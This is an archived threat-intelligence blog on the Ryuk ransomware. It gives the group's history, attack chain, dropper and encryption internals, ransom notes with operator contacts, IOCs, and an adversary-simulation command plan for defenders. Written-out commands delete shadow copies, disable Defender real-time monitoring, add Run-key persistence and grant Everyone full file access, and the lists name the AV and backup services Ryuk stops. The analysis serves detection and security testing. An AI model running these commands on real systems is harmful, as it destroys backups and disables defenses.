{ "id": "39ad7cc1-edff-4221-bc8e-68285a04e52b", "created_at": "2026-04-06T00:19:05.43632Z", "updated_at": "2026-04-10T03:37:26.204876Z", "deleted_at": null, "sha1_hash": "958b5749de0fa782cddb77262ee59443501bdb95", "title": "Ryuk Ransomware: History, Timeline, and Adversary Simulation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 987733, "plain_text": "Ryuk Ransomware: History, Timeline, and Adversary Simulation\r\nArchived: 2026-04-05 20:02:15 UTC\r\nRyuk Ransomware Group\r\nRyuk is the name of a ransomware family, first introduced in August 2018. Once known as a popular Japanese\r\nfictional character, became one of the most vicious ransomware families ever known to humanity, targeting\r\ngovernments, healthcare, education centres, manufacturing and technology organizations. Ryuk ransomware\r\nacquired a reputation of being one of the most notorious ransomware within a short span of 15 months, with its\r\nterror looming over large organizations. Victims include EMCOR, UHS hospitals, and several newspapers. It\r\nwas estimated that Ryuk was able to generate a revenue of $61 million for its operators between February 2018\r\nand October 2019.\r\nWith its first appearance in August 2018, Ryuk gained attention by targeting the operations of Tribune Publishing\r\nnewspapers during the Christmas season of 2018. Initially, what looked like a server outage was the outcome of a\r\ntargeted malware attack, with Ryuk reinfecting the network because the security patches failed to contain the\r\nmalware post quarantine. The primary motive of this ransomware variant is to ensure maximum target file\r\nencryption to hold a massive amount at ransom. Additionally, Ryuk can identify and encrypt network drivers and\r\nincludes system shadow copies, making it impossible to recover from an attack without external backups or\r\nrollback technology.\r\nThis blog will entail the complete attack flow of the Ryuk ransomware group, allowing security practitioners to\r\ntest their cybersecurity posture against the full range of techniques and procedures that Ryuk used. The techniques\r\nand procedures covered in this blog are aggregated from various sources and reports compiled to provide the\r\nreader with a good overview of the Ryuk TTPs.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 1 of 31\n\nRyuk Over Time\r\nBelow you will find a brief timeline of incidents involving the Ryuk ransomware group[6]:\r\nDecember 2018 – Tribune Publishing attack\r\nMarch 2019 – Jackson County's infrastructure was attacked. Damages: $400,000 (22 BTC).\r\nApril 2019 – Imperial County’s IT infrastructure gets hit by Ryuk. The attackers demanded $1.2 million\r\n(65 BTC). Victims refused to pay.\r\nJune 2019 – Lake City systems locked by ransomware. Victims had to pay $460,000 (25 BTC) to regain\r\ncontrol over their systems.\r\nJuly 2019 – La Porte County, the Ryuk ransomware hit public institutions. Victims had to pay $130,000 (7\r\nBTC).\r\nAugust 2019 – Rockville Centre school district affected by Ryuk. The municipality had to pay $100,000 (5\r\nBTC) to regain control.\r\nOctober 2019 – Ryuk creators take down a hospital chain administrated by the National Veterinary\r\nAssociates. Over 400 clinics experienced downtimes in payment systems and patient curation systems.\r\nNovember 2019 – Ryuk operators launch attacks against several HVTs: Louisiana Office of Technology\r\nServices, Prosegur (i.e. Spanish security company), Cadena SER (the largest radio station in Spain), and T-System (E2E healthcare and emergency solutions providers).\r\nJanuary 2020 – Ryuk operators attacked gas and oil facilities. In addition, the same operators were found to\r\nbe involved in several other incidents targeting healthcare providers.\r\nSeptember 2020 – Universal Health Services (UHS) healthcare providers have reportedly shut down\r\nsystems at healthcare facilities after a Ryuk ransomware attack. The incident resulted in about $67 million\r\nin lost operating income, labour expenses, and overall recovery costs.\r\nJanuary 2021 – A new version with “worm-like” capabilities was identified. The new Ryuk variant can\r\nspread automatically/without intervention through infected networks.\r\nMarch 2021 – Ryuk targeted the systems of SEPE, the Spanish government agency for labour. The systems\r\nwere taken down following a ransomware attack that affected more than 700 agency offices across Spain.\r\nApril 2021 – New Ryuk hacking techniques were revealed. The threat actors' favourite initial infection\r\nvector continues to be the targeted phishing emails for malware delivery.\r\nMay 2021 – Ryuk ransomware infects Bio Research Institute after a student installs pirated software. The\r\nattack occurred because the student didn’t want to pay for a license, causing a week’s research data.\r\nMoving forward, the Ryuk Infection chain and attack flow **already part of the FourCore ATTACK Security\r\nValidation Platform will enable security practitioners to:\r\nEvaluate their security controls against the real-world tactics provinding the significance of its real-world\r\nimpact.\r\nAssess the security posture against the tactics, techniques and procedures (TTPs) used by the WIZARD\r\nGroup's Ryuk variant\r\nContinuously validate detection and prevention pipelines against the destructive actions this ransomware\r\nperforms\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 2 of 31\n\nThreat Intel: Ryuk\r\nThe next part of this blog will cover the Ryuk infection chain and the public reports available:\r\nRyuk Ransomware Infection Chain\r\nThe operators behind the Ryuk ransomware take a targeted approach to select and infect their victims. Rather than\r\nattempting to infect many computers and asking a relatively small ransom (like WannaCry), campaigns using the\r\nRyuk ransomware focus on a single organization and have an extremely high asking price for data recovery. Ryuk\r\nis a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It\r\nhas been observed to be used to attack companies or professional environments. Cybersecurity experts figured out\r\nthat Ryuk and Hermes ransomware shares pieces of code.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 3 of 31\n\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 4 of 31\n\nRyuk's Latest Attack Timeline (source: thedfirreport.com/2020/10/08/ryuks-return/)\r\nRyuk Ransomware Attack Mechanism\r\nThe table shown below covers the MITRE ATT\u0026CK tactics, techniques, and procedures used in the Ryuk's attack\r\ncycle:\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 5 of 31\n\nRyuk Actions mapped to Mitre ATT\u0026CK\r\nRyuk has been known to be a part of a more significant \"Triple Threat\" attack that involves Emotet and\r\nTrickBot.\r\nInfection:\r\nRyuk is spread via very targeted means. These include using tailored spear phishing emails and exploiting\r\ncompromised credentials to remotely access systems via the Remote Desktop Protocol (RDP).\r\nThe delivery method for Ryuk is through spam emails like various other malware attacks, often sent\r\nthrough spoofed addresses, to avoid raising suspicion.\r\nA spearphishing email may carry Ryuk directly or be the first in a series of malware infections. For\r\nexample, Emotet, TrickBot, and Ryuk are common combinations.\r\nThe attack chain begins when the user opens a weaponized Microsoft Office document attached to a\r\nphishing email.\r\nOpening the document causes a malicious macro to execute a PowerShell command that attempts to\r\ndownload the banking Trojan Emotet.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 6 of 31\n\nWith RDP, a cybercriminal can install and execute Ryuk directly on the target machine or leverage their\r\naccess to reach and infect other, more valuable systems on the network.\r\nDelivery:\r\nThis Emotet Trojan can download additional malware onto an infected machine that retrieves and executes\r\nTrickbot, which acts as spyware.\r\nCollection:\r\nThis Trickbot spyware collects admin credentials, browser passwords, credit cards, network discovery, and\r\nother intel.\r\nLateral Movement:\r\nAttackers use the data collected in the previous stage to move to critical assets connected to the network\r\nlaterally. The attack chain concludes when the attackers execute Ryuk on these assets. This step entirely\r\ndepends on whether the infection has spread to enough assets to inflict maximum impact to get enough\r\nleverage to demand a large sum. Thus, it becomes the deciding factor for whether the Ryuk ransomware\r\nshould be deployed.\r\nExecution:\r\nRyuk uses a combination of encryption algorithms, including a symmetric algorithm (AES-256) and an\r\nasymmetric one (RSA 4096). The ransomware encrypts a file with the symmetric algorithm and includes a\r\ncopy of the symmetric encryption key encrypted with the RSA public key.\r\nRyuk deliberately avoids encrypting certain file types (including .exe and .dll) and files in specific folders\r\non the system. Thus decreasing the probability that Ryuk will break an infected computer, making file\r\nretrieval more difficult or impossible even if a ransom is paid.\r\nDecryption:\r\nUpon payment of the ransom, the Ryuk operator provides:\r\nA copy of the corresponding RSA private key.\r\nEnabling decryption of the symmetric encryption key and.\r\nUsing it.\r\nThe encrypted files.\r\nRansom Note:\r\nBeing notoriously known to be one of the most expensive ransomware variants, with average ransom demands\r\nreaching higher than $100,000 USD.\r\nRyuk ransom notes contain an email address where victims can communicate with the ransomware operators to\r\nreceive instructions on how to pay the ransom. However, this should be noted that there is no guarantee even if\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 7 of 31\n\nyou submit the ransom. In most of the observed cases, the ransomware operators will take the ransom without\r\nreturning access to the files. Paying a ransom demand should result in the cybercriminal sending a\r\ndecryptor/decryption key.\r\n1Your network has been penetrated.\r\n2\r\n3All files on each host in the network have been encrypted with a strong algorithm.\r\n4\r\n5Backups were either encrypted\r\n6Shadow copies are also removed, so F8 or any other methods may damage encrypted data but not recover.\r\n7\r\n8We exclusively have decryption software for your situation.\r\n9More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decode\r\n10\r\n11No decryption software is available in the public.\r\n12Antivirus companies, researchers, IT specialists, and no other persons cant help you\r\n13encrypt the data.\r\n14\r\n15DO NOT RESET OR SHUTDOWN - files may be damaged.\r\n16DO NOT DELETE readme files.\r\n17\r\n18To confirm our honest intentions. Send 2 different random files, and you will get it\r\n19decrypted.\r\n20\r\n21It can be from different computers on your network to be sure that one key decrypts everything.\r\n22\r\n232 files we unlock for free\r\n24\r\n25To get info (decrypt your files) contact us at\r\n26CliffordGolden93@protonmail.com\r\n27or\r\n28CliffordGolden93@tutanota.com\r\n29\r\n30You will receive BTC address for payment in the reply letter\r\n31\r\n32Ryuk\r\n33\r\n34No system is safe\r\nRansom Payment:\r\nThe ransom demand varies significantly based on observed transactions to known Ryuk BTC addresses. This\r\nsuggests that WIZARD SPIDER calculates the ransom amount based on the size and value of the victim\r\norganization. From the early data available, the observed ransom amount resided between 1.7-99 BTC.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 8 of 31\n\n1Your network has been penetrated.\r\n2\r\n3All files on each host in the network have been encrypted with a strong algorithm.\r\n4Backups were either encrypted or deleted or backup disks were formatted.\r\n5\r\n6Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover.\r\n7\r\n8We exclusively have decryption software for your situation\r\n9No decryption software is available in the public.\r\n10\r\n11DO NOT RESET OR SHUTDOWN - files may be damaged.\r\n12DO NOT RENAME OR MOVE the encrypted and readme files.\r\n13DO NOT DELETE readme files.\r\n14This may lead to the impossibility of recovery of the certain files.\r\n15\r\n16To get info (decrypt your files) contact us at\r\n17KurtSchweickardt@protonmail.com\r\n18or\r\n19KurtSchweickardt@tutanota.com\r\n20\r\n21BTC wallet:\r\n2214hVKm7Ft2rxDBFTNKKRC3KGStMGp2Adhk\r\n23\r\n24Ryuk\r\n25No system is safe\r\nRYUK - Balance of shadow universe\r\nRyuk Ransomware: Analysis in Depth\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 9 of 31\n\nRyuk Infection Chain\r\nMalware Dropper and its shenanigans\r\nThe dropper is loaded onto the victim's machine via a PowerShell, C2C retrieval. Once the dropper lands on the\r\ntarget asset, it will check the MajorVersion property to determine the target operating system. If MajorVersion is\r\nequal to 5, then the dropper will place the ransomware executable into the C:\\Documents and Setting\\Default\r\nUser folder. That's the default ransomware download file for Windows Server 2003, XP, and Windows 2000.\r\nOtherwise, it drops it at C:\\users\\Public\\ . In case of a lookup/file creation failure, the dropper drops Ryuk\r\nmalware in the execution directory of the dropper itself. The name of the dropped executable is five randomly\r\ngenerated characters.\r\nNext, it determines the target system's architecture by calling the IsWow64Process() API.\r\nBefore the dropper exits, it launches the second stage executor using the ShellExecuteW API and passes its path\r\nas a command line argument, deleting the dropper binary.\r\nPersistence\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 10 of 31\n\nRyuk uses the Windows Registry to ensure post-reboot execution by adding an entry to the key\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos and value set to the executable\r\npath: C:\\users\\Public\\BPWPc.exe . The instruction is /v \"svchos\"/t REG_SZ/d allows the malware to run after\r\nevery login.\r\n1C:\\Windows\\System32\\cmd.exe /C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\"\r\nPrivilege Escalation\r\nRyuk obtains further permissions by modifying the SeDebugPrivilege argument of the\r\nAdjustTokenPrivileges() API to adjust its process security access token. According to MSDN,\r\nSeDebugPrivilege is required to debug and modify the memory of a process owned by another account. The user\r\ncan attach a debugger to any process or kernel with this privilege.\r\nProcess Enumeration and Code Injection\r\nRyuk tries to enumerate all the running processes using the CreateToolHelp32Snapshot API and identifies the\r\nuser associated with each process (regular user/administrator/NT AUTHORITY).\r\nThis step is essential to identify the target process for injection. The code injection mechanism will ignore any\r\nsystem process named crsss.exe , lsaas.exe , explorer.exe , or anything running as NT AUTHORITY.\r\nRyuk allocates memory for its process at the target process memory space using VirtualAllocEx() , then copies\r\nand maps the packed code section into the target process's allocated virtual memory using\r\nWriteProcessMemory() API. Finally, it creates a new thread using CreateRemoteThread() to run Ryuk's thread\r\nin the injected process.\r\nDynamic Import Address Resolution\r\nIt is a commonly known practice that a static binary with many imports can look malicious from the EDRs PoV.\r\nTherefore, most malware authors resolve their function imports dynamically using LoadLibraryA() and\r\nGetProcAdress() APIs.\r\nHere is the complete list of all the APIs post-resolution:\r\n1advapi32.dll\r\n2 CryptAcquireContextW\r\n3 CryptDecrypt\r\n4 CryptDeriveKey\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 11 of 31\n\n5 CryptDestroyKey\r\n6 CryptEncrypt\r\n7 CryptExportKey\r\n8 CryptGenKey\r\n9 CryptImportKey\r\n10 GetUserNameA\r\n11 GetUserNameW\r\n12 RegCloseKey\r\n13 RegDeleteValueW\r\n14 RegOpenKeyExA\r\n15 RegOpenKeyExW\r\n16 RegQueryValueExA\r\n17 RegSetValueExW\r\n18kernel32.dll\r\n19 CloseHandle\r\n20 CopyFileA\r\n21 CopyFileW\r\n22 CreateDirectoryW\r\n23 CreateFileA\r\n24 CreateFileW\r\n25 CreateProcessA\r\n26 CreateProcessW\r\n27 DeleteFileW\r\n28 ExitProcess\r\n29 FindClose\r\n30 FindFirstFileW\r\n31 FindNextFileW\r\n32 FreeLibrary\r\n33 GetCommandLineW\r\n34 GetCurrentProcess\r\n35 GetDriveTypeW\r\n36 GetFileAttributesA\r\n37 GetFileAttributesW\r\n38 GetFileSize\r\n39 GetLogicalDrives\r\n40 GetModuleFileNameA\r\n41 GetModuleFileNameW\r\n42 GetModuleHandleA\r\n43 GetStartupInfoW\r\n44 GetTickCount\r\n45 GetVersionExW\r\n46 GetWindowsDirectoryW\r\n47 GlobalAlloc\r\n48 LoadLibraryA\r\n49 ReadFile\r\n50 SetFileAttributesA\r\n51 SetFileAttributesW\r\n52 SetFilePointer\r\n53 Sleep\r\n54 VirtualAlloc\r\n55 VirtualFree\r\n56 WinExec\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 12 of 31\n\n57 Wow64DisableWow64FsRedirection\r\n58 Wow64RevertWow64FsRedirection\r\n59 WriteFile\r\n60ole32.dll\r\n61 CoCreateInstance\r\n62 CoInitialize\r\n63Shell32.dll\r\n64 ShellExecuteA\r\n65 ShellExecuteW\r\n66mpr.dll\r\n67 WNetCloseEnum\r\n68 WNetEnumResourceW\r\n69 WNetOpenEnumW\r\n70Iphlpapi.dll\r\n71 GetIpNetTable\r\nHunting Processes and Services:\r\nRyuk ransomware will kill or put to sleep up to 180 system and AV-related services and up to 40 processes. The\r\nservices and processes are killed using the net stop and taskkill /IM commands.\r\nTargetted Services:\r\n1 Acronis VSS Provider\r\n2 Enterprise Client Service\r\n3 Sophos Agent\r\n4 Sophos AutoUpdate Service\r\n5 Sophos Clean Service\r\n6 Sophos Device Control Service\r\n7 Sophos File Scanner Service\r\n8 Sophos Health Service\r\n9 Sophos MCS Agent\r\n10 Sophos MCS Client\r\n11 Sophos Message Router\r\n12 Sophos Safestore Service\r\n13 Sophos System Protection Service\r\n14 Sophos Web Control Service\r\n15 SQLsafe Backup Service\r\n16 SQLsafe Filter Service\r\n17 Symantec System Recovery\r\n18 Veeam Backup Catalog Data Service\r\n19 AcronisAgent\r\n20 AcrSch2Svc\r\n21 Antivirus\r\n22 ARSM\r\n23 BackupExecAgentAccelerator\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 13 of 31\n\n24 BackupExecAgentBrowser\r\n25 BackupExecDeviceMediaService\r\n26 BackupExecJobEngine\r\n27 BackupExecManagementService\r\n28 BackupExecRPCService\r\n29 BackupExecVSSProvider\r\n30 bedbg\r\n31 DCAgent\r\n32 EPSecurityService\r\n33 EPUpdateService\r\n34 EraserSvc11710\r\n35 EsgShKernel\r\n36 FA_Scheduler\r\n37 IISAdmin\r\n38 IMAP4Svc\r\n39 macmnsvc\r\n40 masvc\r\n41 MBAMService\r\n42 MBEndpointAgent\r\n43 McAfeeEngineService\r\n44 McAfeeFramework\r\n45 McAfeeFrameworkMcAfeeFramework\r\n46 McShield\r\n47 McTaskManager\r\n48 mfemms\r\n49 mfevtp\r\n50 MMS\r\n51 mozyprobackup\r\n52 MsDtsServer\r\n53 MsDtsServer100\r\n54 MsDtsServer110\r\n55 MSExchangeES\r\n56 MSExchangeIS\r\n57 MSExchangeMGMT\r\n58 MSExchangeMTA\r\n59 MSExchangeSA\r\n60 MSExchangeSRS\r\n61 MSOLAP$SQL_2008\r\n62 MSOLAP$SYSTEM_BGC\r\n63 MSOLAP$TPS\r\n64 MSOLAP$TPSAMA\r\n65 MSSQL$BKUPEXEC\r\n66 MSSQL$ECWDB2\r\n67 MSSQL$PRACTICEMGT\r\n68 MSSQL$PRACTTICEBGC\r\n69 MSSQL$PROFXENGAGEMENT\r\n70 MSSQL$SBSMONITORING\r\n71 MSSQL$SHAREPOINT\r\n72 MSSQL$SQL_2008\r\n73 MSSQL$SYSTEM_BGC\r\n74 MSSQL$TPS\r\n75 MSSQL$TPSAMA\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 14 of 31\n\n76 MSSQL$VEEAMSQL2008R2\r\n77 MSSQL$VEEAMSQL2012\r\n78 MSSQLFDLauncher\r\n79 MSSQLFDLauncher$PROFXENGAGEMENT\r\n80 MSSQLFDLauncher$SBSMONITORING\r\n81 MSSQLFDLauncher$SHAREPOINT\r\n82 MSSQLFDLauncher$SQL_2008\r\n83 MSSQLFDLauncher$SYSTEM_BGC\r\n84 MSSQLFDLauncher$TPS\r\n85 MSSQLFDLauncher$TPSAMA\r\n86 MSSQLSERVER\r\n87 MSSQLServerADHelper100\r\n88 MSSQLServerOLAPService\r\n89 MySQL80\r\n90 MySQL57\r\n91 ntrtscan\r\n92 OracleClientCache80\r\n93 PDVFSService\r\n94 POP3Svc\r\n95 ReportServer\r\n96 ReportServer$SQL_2008\r\n97 ReportServer$SYSTEM_BGC\r\n98 ReportServer$TPS\r\n99 ReportServer$TPSAMA\r\n100 RESvc\r\n101 sacsvr\r\n102 SamSs\r\n103 SAVAdminService\r\n104 SAVService\r\n105 SDRSVC\r\n106 SepMasterService\r\n107 ShMonitor\r\n108 Smcinst\r\n109 SmcService\r\n110 SMTPSvc\r\n111 SNAC\r\n112 SntpService\r\n113 sophossps\r\n114 SQLAgent$BKUPEXEC\r\n115 SQLAgent$ECWDB2\r\n116 SQLAgent$PRACTTICEBGC\r\n117 SQLAgent$PRACTTICEMGT\r\n118 SQLAgent$PROFXENGAGEMENT\r\n119 SQLAgent$SBSMONITORING\r\n120 SQLAgent$SHAREPOINT\r\n121 SQLAgent$SQL_2008\r\n122 SQLAgent$SYSTEM_BGC\r\n123 SQLAgent$TPS\r\n124 SQLAgent$TPSAMA\r\n125 SQLAgent$VEEAMSQL2008R2\r\n126 SQLAgent$VEEAMSQL2012\r\n127 SQLBrowser\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 15 of 31\n\n128 SQLSafeOLRService\r\n129 SQLSERVERAGENT\r\n130 SQLTELEMETRY\r\n131 SQLTELEMETRY$ECWDB2\r\n132 SQLWriter\r\n133 SstpSvc\r\n134 svcGenericHost\r\n135 swi_filter\r\n136 swi_service\r\n137 swi_update_64\r\n138 TmCCSF\r\n139 tmlisten\r\n140 TrueKey\r\n141 TrueKeyScheduler\r\n142 TrueKeyServiceHelper\r\n143 UI0Detect\r\n144 VeeamBackupSvc\r\n145 VeeamBrokerSvc\r\n146 VeeamCatalogSvc\r\n147 VeeamCloudSvc\r\n148 VeeamDeploymentService\r\n149 VeeamDeploySvc\r\n150 VeeamEnterpriseManagerSvc\r\n151 VeeamMountSvc\r\n152 VeeamNFSSvc\r\n153 VeeamRESTSvc\r\n154 VeeamTransportSvc\r\n155 W3Svc\r\n156 wbengine\r\n157 WRSVC\r\n158 MSSQL$VEEAMSQL2008R2\r\n159 SQLAgent$VEEAMSQL2008R2\r\n160 VeeamHvIntegrationSvc\r\n161 swi_update\r\n162 SQLAgent$CXDB\r\n163 SQLAgent$CITRIX_METAFRAME\r\n164 SQL Backups\r\n165 MSSQL$PROD\r\n166 Zoolz 2 Service\r\n167 MSSQLServerADHelper\r\n168 SQLAgent$PROD\r\n169 msftesql$PROD\r\n170 NetMsmqActivator\r\n171 EhttpSrv\r\n172 ekrn\r\n173 ESHASRV\r\n174 MSSQL$SOPHOS\r\n175 SQLAgent$SOPHOS\r\n176 AVP\r\n177 klnagent\r\n178 MSSQL$SQLEXPRESS\r\n179 SQLAgent$SQLEXPRESS\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 16 of 31\n\n180 wbengine\r\n181 kavfsslp\r\n182 KAVFSGT\r\n183 KAVFS\r\n184 mfefire\r\nTargetted Processes:\r\n1 zoolz.exe\r\n2 agntsvc.exe\r\n3 dbeng50.exe\r\n4 dbsnmp.exe\r\n5 encsvc.exe\r\n6 excel.exe\r\n7 firefoxconfig.exe\r\n8 infopath.exe\r\n9 isqlplussvc.exe\r\n10 msaccess.exe\r\n11 msftesql.exe\r\n12 mspub.exe\r\n13 mydesktopqos.exe\r\n14 mydesktopservice.exe\r\n15 mysqld.exe\r\n16 mysqld-nt.exe\r\n17 mysqld-opt.exe\r\n18 ocautoupds.exe\r\n19 ocomm.exe\r\n20 ocssd.exe\r\n21 onenote.exe\r\n22 oracle.exe\r\n23 outlook.exe\r\n24 powerpnt.exe\r\n25 sqbcoreservice.exe\r\n26 sqlagent.exe\r\n27 sqlbrowser.exe\r\n28 sqlservr.exe\r\n29 sqlwriter.exe\r\n30 steam.exe\r\n31 synctime.exe\r\n32 tbirdconfig.exe\r\n33 thebat.exe\r\n34 thebat64.exe\r\n35 thunderbird.exe\r\n36 visio.exe\r\n37 winword.exe\r\n38 wordpad.exe\r\n39 xfssvccon.exe\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 17 of 31\n\n40 tmlisten.exe\r\n41 PccNTMon.exe\r\n42 CNTAoSMgr.exe\r\n43 Ntrtscan.exe\r\n44 mbamtray.exe\r\nShadow Copy Deletion\r\nRyuk runs a batch script in C:\\Users\\Public\\window.bat , which deletes all shadow copies and possible backups,\r\nand then deletes itself. The operations include:\r\nUsing the vssadmin resize to resize the shadow storage\r\nvssadmin Delete Shadow /all /quiet\r\nvssadmin resize is unique; in the case of any third-party backup provider, vssadmin can display an\r\nerror while trying to delete the backups indicating the presence of these backups outside the allowed\r\ncontext. Ryuk uses the above command, tasking vssadmin to delete storage when the shadow copies are\r\nresized. It forces the shadow copies to be deleted regardless of their context.\r\nThe del /s /q command deletes various files based on their extension and folder locations. Extensions include:-\r\n.vhd, .bac, .bak, .wbcat, .bfk, .set, .win, .dsk and any folder with a prefix \"Backup\" in it.\r\nEncryption\r\nWhile the goal of Ryuk is to make the most money, Ryuk does not have many safeguards to ensure the stability of\r\nthe host while encrypting the target system files. Ryuk avoids encrypting files with extensions .exe, .dll, .hrmlog\r\n(a debug log made by the Hermes Developer - plug: there are many similarities between Hermes and Ryuk, check\r\nreferences for more). While safe listing the above extensions, there is no provision to whitelist system drivers\r\n(.sys), OLE control extension (.ocx) and other executable file types. Encrypting these files could make the host\r\nunstable. Due to the absence of proper whitelisting, an infected machine can become unstable over time and\r\nunbootable if restarted.\r\nRyuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Without the\r\nprivate key provided by WIZARD SPIDER, the files cannot be decrypted and are unrecoverable. It starts\r\nenumerating files using FindFirstFileW() and FindNextFileW() then it passes each file name to a new\r\nencryption thread. Each encryption thread starts by generating a random 256 AES encryption key using\r\nCryptGenKey() . Unlike modern Go malware, Ryuk utilizes the Windows Crypto API for the encryption process.\r\nThen, it goes into the typical encryption loop, and the files are encrypted in chunks with a chunk size of 1000000\r\nbytes. Finally, Ryuk writes a metadata block of size 274 bytes* at the end of the file. The first *6 bytes* are the\r\nkeyword HERMES. Finally, the AES key is encrypted with an RSA public key before it's written to the end of the\r\nfile and then exported using CryptExportKey() ; this function generates 12 bytes of Blob information + 256 bytes\r\n(the encrypted key). The RSA public key is embedded in the executable. It's imported using CryptImportKey()\r\nand passed to every encryption thread. After the file has been encrypted, a file extension of .RYK is appended to\r\nthe file. All directories will have a ransom note RyukReadMe.txt written to the directory.\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 18 of 31\n\nRyuk is one of the few ransomware which enumerates and encrypts network shares. It performs this operation by\r\nenumerates network shares using WNetOpenEnumW() and WNetEnumResourceA() respectively. For each network\r\nresource found, the drive path will get appended to a list separated by a semicolon. This list will be used later to\r\nencrypt these network shares with the same encryption process above.\r\nRyuk Ransomware - Sandbox Execution and Report\r\npowered by ANY.RUN\r\nAnalysis Report for the above execution present here.\r\nIOCs\r\nHashes:\r\nRyuk (second-stage): 8b0a5fb13309623c3518473551cb1f55d38d8450129d4a3c16b476f7b2867d7\r\nDropper: 23f8aa94ffb3c08a62735fe7fee5799880a8f322ce1d55ec49a13a3f85312db2\r\nMD5 Hashes:\r\n1cb0c1248d3899358a375888bb4e8f3fe\r\n2d4a7c85f23438de8ebb5f8d6e04e55fc\r\n33895a370b0c69c7e23ebb5ca1598525d\r\n0:00 / 5:16\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 19 of 31\n\n4567407d941d99abeff20a1b836570d30\r\n5c0d6a263181a04e9039df3372afb8016\r\nRegistry:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nEmails (primarily random):\r\n1WayneEvenson@protonmail[.]com\r\n2WayneEvenson@tutanota[.]com\r\nFiles: Ryuk drops the ransom note, RyukReadMe.html or RyukReadMe.txt, in every folder where it has encrypted\r\nfiles.\r\nRyuk Adversary Simulation Plan\r\nBased on the aggregated threat intelligence reports and mapping to the MITRE ATT\u0026CK matrix, FourCore has\r\nreleased a Ryuk Ransomware Adversary Simulation Assessment. While the payloads used by the ATTACK\r\nplatform are complex, dynamic, and native, for ease of this assessment, we will be providing Cmd/Powershell\r\ncommands to execute similar behaviour.\r\nRyuk Ransomware Assessment with FourCore ATTACK\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 20 of 31\n\nExecution\r\n1. T1059 - Command and Scripting Interpreter Ryuk has used cmd.exe to create a Registry entry to establish\r\npersistence and create directory for Ryuk AD scan.\r\n1`cmd /c mkdir %TEMP%\\ryuk`\r\n2. T1059.001 - PowerShell Ryuk uses powershell to configure the Microsoft Defender Real-Time scanning. It\r\nalso uses to compress files into archives.\r\n1`powershell Set-MpPreference -DisableRealtimeMonitoring $false`, `powershell \"Compress-Archive $env:TEMP\\ryuk\\\r\n3. T1059.003 - Windows Command Shell Ryuk has used cmd.exe to create a Registry entry to establish\r\npersistence.\r\n4. T1053 - Scheduled Task/Job Ryuk can remotely create a scheduled task to execute itself on a system.\r\n1`cmd /c SCHTASKS /QUERY /TN \"RyukAttack\"`\r\n5. T1053.005 - Scheduled Task/Job: Scheduled Task Ryuk can remotely create a scheduled task to execute\r\nitself on a system.\r\n1`cmd /c SCHTASKS /CREATE /SC DAILY /TN \"RyukAttack\" /TR \"C:\\Windows\\System32\\calc.exe\" /ST 11:00 /F`\r\n6. T1106 - Native API Ryuk has used multiple native APIs including ShellExecuteW to run\r\nexecutables,GetWindowsDirectoryW to create folders, and VirtualAlloc, WriteProcessMemory, and\r\nCreateRemoteThread for process injection.[1]\r\nPersistence\r\nhttps://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp\r\nPage 21 of 31\n\n1. T1547.001 - Registry Run Keys / Startup Folder Ryuk has used the Windows command line to create a\r\nRegistry entry under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish\r\npersistence.\r\nPrivilege Escalation\r\n1. T1055 - Process Injection Ryuk has injected itself into remote processes to encrypt files using a\r\ncombination of VirtualAlloc , WriteProcessMemory , and CreateRemoteThread .\r\n2. T1134 - Access Token Manipulation Ryuk has attempted to adjust its token privileges to have the\r\nSeDebugPrivilege .\r\nDefense Evasion\r\n1. T1140 - Deobfuscate/Decode Files or Information Ryuk uncompresses the dowloaded archive in a\r\ntemporary directory.\r\n1`cmd /c powershell -Command Expand-Archive \"$env:TEMP\\ryuk\\AdFind.zip\" -DestinationPath \"$env:TEMP\\ryuk\\\"`\r\n2. T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions\r\nModification Ryuk can launch icacls /grant Everyone:F /T /C /Q to delete every access-based\r\nrestrictions on files and directories.\r\n3. T1562.001 - Impair Defenses: Disable or Modify Tools Ryuk has stopped services related to anti-virus.\r\nRyuk used encoded powershell command to disable Microsoft Windows Defender Service. (Set-MpPreference -DisableRealtimeMonitoring $true)\r\n1powershell.exe -nop -exec bypass 